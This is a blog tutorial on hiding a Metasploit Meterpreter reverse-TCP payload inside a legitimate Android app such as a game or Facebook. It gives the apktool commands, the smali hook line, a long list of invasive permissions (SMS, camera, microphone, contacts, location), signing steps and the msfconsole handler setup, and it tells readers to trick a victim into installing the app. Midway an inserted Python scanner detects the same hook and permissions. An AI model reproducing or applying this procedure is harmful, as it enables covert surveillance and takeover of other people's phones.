Hacking Android With Metasploit!
In the first part of this series we discussed how to create a Metasploit payload and how to configure your Linux machine with a NOIP account for DDNS.
In this second and last part we'll hook up the Metasploit handler and embed the payload inside an Android app (your favoured apps like Facebook or Gmail, or any game).
For that we require:
- APKTOOL, the Android reverse-engineering tool
You can install apktool easily by typing this command in a terminal (apktool ships with the Kali Linux OS):
sudo apt-get install apktool
- Jarsigner, to digitally sign the Android app with a fake (self-signed) certificate
Download the necessary files for jarsigner from our GitHub repository:
OneClicksigner
So now all we have to do is:
1. Generate the Meterpreter payload
2. Decompile the payload and the original apk
3. Copy the payload files to the original apk
4. Inject the hook into the appropriate activity of the original apk
5. Inject the permissions in the AndroidManifest.xml file
6. Re-compile the original apk
7. Sign the apk using Jarsigner
We already generated the Metasploit payload in the last part, so we'll continue with
Step two
Decompile the payload and the APK file into which you want to place your payload:
The apktool decompile commands are as follows:
apktool d -f -o payload /root/meterpreter.apk
apktool d -f -o original /root/original_app_name.apk
When this finishes there will be two folders under /root: one contains the files of the msf payload and the other the files of the original apk that the payload is to be bound into.
Step three
Copying the files from the payload apk to the original apk:
Open the AndroidManifest.xml file located inside the /root/original folder using any text editor.
If you know HTML, this file will look familiar: both are markup languages and both use the familiar tag-and-attribute structure, e.g. <tag attribute="value">Content</tag>. Look for an <activity> tag which contains both of the following lines:
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
Step four
Inject the hook into the appropriate activity of the original apk
On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note the value of its android:name attribute.
The two lines we searched for signify that this is the activity that starts when the app is launched from its launcher icon; it is the MAIN activity, similar to the main function in traditional programming.
Now that we have the name of the activity we want to inject the hook into, let's get to it. First, open the .smali code of that activity in a text editor. Open a terminal and type:
gedit /root/original/smali/Activity_Path
Replace Activity_Path with the activity's android:name, but with slashes instead of dots. The smali code is stored in folders named after the package path in android:name, so that is how we locate the .smali file.
Then search for the following line in the smali code using CTRL+F:
;->onCreate(Landroid/os/Bundle;)V
When you find it, change the entire line to this:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
When the main activity executes this line, the app runs its main activity together with the Metasploit payload,
so we get a meterpreter shell in our console.
Step five
Inject the permissions in the AndroidManifest.xml file
Now we are almost set, but we still have to grant the necessary additional permissions to get full control over the Android device; for that we have to edit the AndroidManifest.xml file.
The XML file looks like HTML, so it's easy to edit.
Copy the text below and place it in the manifest after the <permission> tag with the others, but don't create duplicate lines:
<uses-permission android:name="android.permission.VIBRATE"/>
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/>
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-permission android:name="android.permission.DEVICE_POWER"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.EXPAND_STATUS_BAR"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
<uses-permission android:name="android.permission.STATUS_BAR"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="com.android.launcher.permission.READ_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="com.android.vending.BILLING"/>
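For the defender's side of steps four and five, here is an added example (not from the original post) that scans an apktool-decoded app tree for the two traces this procedure leaves behind: the injected Lcom/metasploit/stage/Payload hook in smali and an oversized, possibly duplicated permission list. The function names and the sample tree below are constructed for illustration.

```python
# Added example (not from the original post): a defender-side check over an
# apktool-decoded app tree for the artefacts this tutorial leaves behind.
import os
import re
import xml.etree.ElementTree as ET

ANDROID_NAME = "{http://schemas.android.com/apk/res/android}name"
HOOK_RE = re.compile(r"Lcom/metasploit/stage/Payload;->start\(")
# Permissions from the tutorial's list that a game or chat app has no use for.
SENSITIVE = {"android.permission." + p for p in (
    "SEND_SMS", "READ_SMS", "RECEIVE_SMS", "RECORD_AUDIO", "CAMERA",
    "READ_CONTACTS", "CALL_PHONE", "READ_LOGS", "RECEIVE_BOOT_COMPLETED")}

def find_hook_lines(smali_text):
    """1-based line numbers that call the Metasploit stage loader."""
    return [i for i, ln in enumerate(smali_text.splitlines(), 1) if HOOK_RE.search(ln)]

def audit_manifest(manifest_xml):
    """Return (sensitive permissions requested, duplicated permission names)."""
    names = [e.get(ANDROID_NAME) for e in ET.fromstring(manifest_xml).iter("uses-permission")]
    return sorted(SENSITIVE & set(names)), sorted({n for n in names if names.count(n) > 1})

def scan_files(files):
    """files maps a path relative to the apktool output dir to its text content."""
    report = {"hooks": [], "sensitive": [], "dupes": []}
    for rel, text in sorted(files.items()):
        if rel.endswith(".smali"):
            report["hooks"] += [(rel, n) for n in find_hook_lines(text)]
        elif rel == "AndroidManifest.xml":
            report["sensitive"], report["dupes"] = audit_manifest(text)
    report["suspicious"] = bool(report["hooks"]) or len(report["sensitive"]) >= 3
    return report

def scan_dir(root_dir):
    """Scan a real `apktool d` output directory."""
    files = {}
    for dirpath, _, names in os.walk(root_dir):
        for name in (n for n in names if n.endswith(".smali") or n == "AndroidManifest.xml"):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                files[os.path.relpath(path, root_dir).replace(os.sep, "/")] = fh.read()
    return scan_files(files)

# Constructed sample mimicking a trojanised app's decoded tree (not a real app).
SAMPLE = {
    "AndroidManifest.xml": """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/></manifest>""",
    "smali/com/example/game/MainActivity.smali": """.method protected onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
.end method""",
}
```

Run scan_dir on the folder apktool produced to get the same report for a real sample; a hit on the hook is near-conclusive, while the permission check alone only flags an app worth a closer look.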
Step six
Re-compile the original apk
After saving the XML file we have to re-compile the folder so that the embedded payload ends up in the .apk file:
apktool b /root/original
Now the original apk file is ready!
Step seven
Sign the apk using Jarsigner
Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority; Android apps often use self-signed certificates. The app developer holds the certificate's private key.
In this case we are going to sign the apk using the default Android debug key. Just run the following command:
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey
The keystore file and all the other necessary files are in the oncliksign.zip file; please download it from the following links:
Download Link1
Download Link2
Now, if you can get the victim to install and run this very legit-looking app on their phone, you get a working meterpreter session on it!
Open your console and run:
->msfconsole
->use multi/handler
->set PAYLOAD android/meterpreter/reverse_tcp
->set LHOST
->set LPORT 4444
->exploit
When specifying PAYLOAD, check that it is the same one you gave while creating the payload;
to get the meterpreter session, port 4444 must be port-forwarded from your router/modem.
To do this, go to your gateway or the home page of your router (example: 192.168.1.1/home.html).
There you'll find the Virtual Server or Port Forwarding option; set TCP port forwarding active.
If you use the internet from an Android mobile hotspot, download one of the port-forwarding apps available on the Play Store.
What you gain from this tool:
When the victim installs the app on their phone you get a meterpreter session, and you can perform many operations on it such as taking a photo, recording audio, check_root, etc.
Just type help once you have the meterpreter session and the available operations will be listed!
I hope this Metasploit series on hacking Android phones has been helpful. 🙂
If you have any queries, please write in the comments section and we'll take care of them.
Thank you!
Lanwil DS (Team HR)